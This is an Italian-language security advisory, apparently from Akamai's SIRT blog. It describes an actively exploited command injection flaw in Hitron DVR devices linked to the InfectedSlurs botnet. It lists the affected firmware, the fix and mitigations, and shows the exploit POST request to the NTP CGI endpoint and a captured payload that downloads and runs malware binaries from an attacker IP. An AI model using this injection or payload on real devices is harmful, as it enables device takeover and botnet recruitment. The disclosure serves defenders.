X

Vi serve il cloud computing? Iniziate subito

Akamai logo
+1-8774252624
+1-8774252624
Login
Control Center
Accesso alla piattaforma Akamai
Cloud Manager
Gestione delle risorse cloud
Prova Akamai
Siete sotto attacco?
Login
Control Center
Accesso alla piattaforma Akamai
Cloud Manager
Gestione delle risorse cloud

Vulnerabilità sfruttata attivamente nei dispositivi Hitron DVR: correzioni e patch disponibili

Akamai Wave Blue

scritto da

Aline Eliovich, Kyle Lefton, Chad Seaman, e Larry Cashdollar

January 30, 2024

Aline Eliovich

scritto da

Aline Eliovich

Avvalendosi dei suoi sei anni di esperienza nel campo della sicurezza, Aline Eliovich lavora attualmente come Researcher del SIRT (Security Intelligence Response Team) di Akamai. Ha studiato informatica presso la Holon Technology Institute. Nelle sue ricerche, Aline ama adottare diversi metodi OSINT (OSINT).

Onda blu di Akamai

scritto da

Kyle Lefton

Kyle Lefton è Security Researcher del SIRT (Security Intelligence Response Team) di Akamai. Dopo aver svolto il ruolo di Intelligence Analyst per il Ministero della Difesa statunitense, Kyle ha maturato un'esperienza pluriennale in difesa informatica, ricerca sulle minacce e controspionaggio. Si occupa con passione di indagare sulle minacce emergenti, ricerca delle vulnerabilità e mappatura dei gruppi di minacce. Nel tempo libero, ama circondarsi di amici e parenti, dedicarsi ai giochi di strategia e fare escursioni all'aperto.

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman è Principal Security Researcher e Team Lead del SIRT (Security Intelligence Response Team) di Akamai. Si definisce con orgoglio un "Internet Dumpster Diver" e si diverte a esaminare le anomalie rilevate. Chad ha iniziato la sua carriera come programmatore e, dopo le esperienze nel settore della sicurezza, dello sfruttamento e delle indagini forensi tramite le indagini sulle violazioni, la sicurezza è diventata rapidamente il suo lavoro preferito. Ora trascorre il suo tempo immerso in indagini su malware, reverse engineering, ricerca sulle vulnerabilità, attacchi DDoS e indagini sui crimini informatici. Gli piace far volare aeroplani, praticare fori sulla carta a distanza e passare il tempo in mezzo alla natura, preferibilmente nei boschi, su un sentiero, su una bici da cross..

Larry Cashdollar

scritto da

Larry Cashdollar

Larry W. Cashdollar lavora nel settore della sicurezza come ricercatore di vulnerabilità da oltre 18 anni ed è attualmente membro del Security Incident Response Team di Akamai Technologies. Ha studiato informatica presso la University of Southern Maine. Ha documentato più di 150 vulnerabilità dei software e ha presentato le sue ricerche al BSides di Boston, all'OWASP di Rhode Island e al Defcon. Gli piace passare il suo tempo libero all'aria aperta e restaurando motori per mini-bike.

Nell'ambito del rilevamento di InfectedSlurs, il team Akamai SIRT ha scoperto alcune vulnerabilità in vari modelli di dispositivi Hitron DVR che vengono attivamente sfruttate in rete.

Analisi riassuntiva

Cosa dovete sapere

Nell'ambito del rilevamento di InfectedSlurs, il team Akamai SIRT ha scoperto alcune vulnerabilità in vari modelli di dispositivi Hitron DVR che vengono attivamente sfruttate in rete. I dispositivi Hitron sono stati prodotti nella Corea del Sud da Hitron Systems.

La vulnerabilità consente ad un criminale autenticato di sferrare un attacco di inserimento di comandi del sistema operativo (OS Command Injection) con un payload trasmesso tramite una richiesta POST all'interfaccia di gestione. Nella sua configurazione attuale, vengono utilizzate le credenziali predefinite del dispositivo nei payload acquisiti.

Le versioni firmware e i dispositivi interessati sono:

  • DVR HVR-4781: versioni 1.03 - 4.02

  • DVR HVR-8781: versioni 1.03 - 4.02

  • DVR HVR-16781: versioni 1.03 - 4.02

  • DVR LGUVR-4H: versioni 1.02 - 4.02

  • DVR LGUVR-8H: versioni 1.02 - 4.02

  • DVR LGUVR-16H: versioni 1.02 - 4.02

Il fornitore (Hitron Systems) ha rilasciato nuove versioni firmware per risolvere le vulnerabilità. Il fornitore suggerisce di aggiornare il firmware di tutti i modelli interessati alla versione ≥ 4.03 non appena possibile Sono stati pubblicati, inoltre, altri consigli da CISA e KISA. KISA ha anche pubblicato consigli relativi alle singole CVE, che si trovano ai seguenti collegamenti:

Rilevamento di uno sfruttamento

Alla fine di ottobre 2023, gli analisti del SIRT di Akamai hanno notato un'impennata nell'attività dei nostri honeypot che ha preso di mira una porta TCP raramente sfruttata. Gli attacchi sferrati con una bassa frequenza sembravano inizialmente tentare un'autenticazione tramite una richiesta POST al /cgi-bin/system_ntp.cgi (Figura 1), quindi, successivamente, tentavano uno sfruttamento di tipo command injection (Figura 2).  I dispositivi Hitron Systems DVR presi di mira sono vulnerabili ad una RCE tramite command injection (Figura 3). Una volta effettuata l'autenticazione, il criminale prende di mira la vulnerabilità command injection presente nel parametro timeserver tramite una richiesta POST al /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Figura 1. Tentativo di autenticazione

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Figura 2. Tentativo di sfruttamento

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Figura 3. Payload RCE acquisito

Protezione

Gli utenti di dispositivi Hitron DVR interessati da questa vulnerabilità devono effettuare immediatamente l'aggiornamento all'ultima versione firmware disponibile (≥ 4.03) per risolvere la vulnerabilità RCE.  

Inoltre, per proteggersi da questa minaccia e da altre minacce in futuro, è consigliabile implementare diverse misure di sicurezza. Innanzitutto, le organizzazioni e i singoli utenti che utilizzano i dispositivi interessati devono cambiare immediatamente le credenziali di accesso predefinite per motivi di sicurezza. Monitorare regolarmente i registri e il traffico di rete può aiutare a rilevare tempestivamente eventuali attività sospette. Una tempestiva installazione di aggiornamenti e patch di sicurezza forniti dal produttore del dispositivi è fondamentale per risolvere la vulnerabilità identificata.

La collaborazione con ricercatori della sicurezza, provider di servizi di intelligence sulle minacce e altre aziende del settore può aiutarvi a tenervi aggiornati sulle vulnerabilità e sulle minacce emergenti. Infine, mantenere un inventario aggiornato dei dispositivi connessi e implementare la segmentazione della rete possono limitare il potenziale impatto di tali attacchi.

Conclusione

Per risolvere i problemi di sicurezza identificati nei sistemi Hitron e nei dispositivi associati, è richiesto un approccio multiforme, che combina consapevolezza degli utenti, tempestiva applicazione di patch, monitoraggio proattivo e collaborazione all'interno della comunità della cybersicurezza. Con l'adozione di queste misure, le organizzazioni e i singoli individui possono ridurre notevolmente i rischi posti dall'attività dannosa che è stata osservata.

Tenetevi al passo

Per tenervi aggiornati sulle minacce e sugli altri risultati forniti dal SIRT e da altri gruppi di ricerca sulla sicurezza di Akamai, seguiteci su X (in precedenza, Twitter) o date un'occhiata al nostro hub SIG.

Il team SIRT di Akamai desidera ringraziare tutti in CISA, US-CERT e KISA per la loro assistenza nella segnalazione di queste vulnerabilità ai fornitori.

Consulta altre ricerche
Akamai Wave Blue

scritto da

Aline Eliovich, Kyle Lefton, Chad Seaman, e Larry Cashdollar

January 30, 2024

Aline Eliovich

scritto da

Aline Eliovich

Avvalendosi dei suoi sei anni di esperienza nel campo della sicurezza, Aline Eliovich lavora attualmente come Researcher del SIRT (Security Intelligence Response Team) di Akamai. Ha studiato informatica presso la Holon Technology Institute. Nelle sue ricerche, Aline ama adottare diversi metodi OSINT (OSINT).

Onda blu di Akamai

scritto da

Kyle Lefton

Kyle Lefton è Security Researcher del SIRT (Security Intelligence Response Team) di Akamai. Dopo aver svolto il ruolo di Intelligence Analyst per il Ministero della Difesa statunitense, Kyle ha maturato un'esperienza pluriennale in difesa informatica, ricerca sulle minacce e controspionaggio. Si occupa con passione di indagare sulle minacce emergenti, ricerca delle vulnerabilità e mappatura dei gruppi di minacce. Nel tempo libero, ama circondarsi di amici e parenti, dedicarsi ai giochi di strategia e fare escursioni all'aperto.

Chad Seaman headshot

scritto da

Chad Seaman

Chad Seaman è Principal Security Researcher e Team Lead del SIRT (Security Intelligence Response Team) di Akamai. Si definisce con orgoglio un "Internet Dumpster Diver" e si diverte a esaminare le anomalie rilevate. Chad ha iniziato la sua carriera come programmatore e, dopo le esperienze nel settore della sicurezza, dello sfruttamento e delle indagini forensi tramite le indagini sulle violazioni, la sicurezza è diventata rapidamente il suo lavoro preferito. Ora trascorre il suo tempo immerso in indagini su malware, reverse engineering, ricerca sulle vulnerabilità, attacchi DDoS e indagini sui crimini informatici. Gli piace far volare aeroplani, praticare fori sulla carta a distanza e passare il tempo in mezzo alla natura, preferibilmente nei boschi, su un sentiero, su una bici da cross..

Larry Cashdollar

scritto da

Larry Cashdollar

Larry W. Cashdollar lavora nel settore della sicurezza come ricercatore di vulnerabilità da oltre 18 anni ed è attualmente membro del Security Incident Response Team di Akamai Technologies. Ha studiato informatica presso la University of Southern Maine. Ha documentato più di 150 vulnerabilità dei software e ha presentato le sue ricerche al BSides di Boston, all'OWASP di Rhode Island e al Defcon. Gli piace passare il suo tempo libero all'aria aperta e restaurando motori per mini-bike.

Blog correlati

Prima o poi, ogni impresa medio-grande dovrà affrontare un problema di cybersicurezza, la cui risoluzione richiederà le competenze di esperti del settore.

Esame dell'anno 2024: i dati di oggi con uno sguardo al domani

December 03, 2024
Sei esperti di cybersicurezza di Akamai riflettono sulle tendenze e sugli eventi più significativi del 2024, fornendo, al contempo, il loro consapevole punto di vista su cosa aspettarsi nel 2025.
di Mitch Mayne
Maggiori dettagli
Sono tantissimi gli svantaggi legati ai videogiochi, tuttavia il peggiore di essi non è rappresentato dai costi economici, ma dallo stress a cui viene sottoposta la nostra salute mentale.
Sono tantissimi gli svantaggi legati ai videogiochi, tuttavia il peggiore di essi non è rappresentato dai costi economici, ma dallo stress a cui viene sottoposta la nostra salute mentale.

Come combattere la tossicità emotiva nel gaming per una corretta adozione del digitale

December 02, 2024
Il nostro stato mentale influisce sul nostro modo di lavorare, relazionarsi e giocare. Scoprite cosa potete fare per combattere la tossicità nel gaming e non solo.
di Tricia Howard
Maggiori dettagli
Questo mese, sono state rilasciate 89 CVE in totale in 39 diversi componenti, quattro delle quali sono critiche e due delle quali sono state sfruttate in rete.
Questo mese, sono state rilasciate 89 CVE in totale in 39 diversi componenti, quattro delle quali sono critiche e due delle quali sono state sfruttate in rete.

Il punto di vista di Akamai sulla Patch Tuesday di novembre 2024

November 15, 2024
Moltissime CVE da digerire, ma non preoccupatevi: c'è ancora posto per il dessert. Questo mese, su 89 CVE in totale, 2 di esse sono risultate vulnerabilità sfruttate in rete.
di Akamai Security Intelligence Group
Maggiori dettagli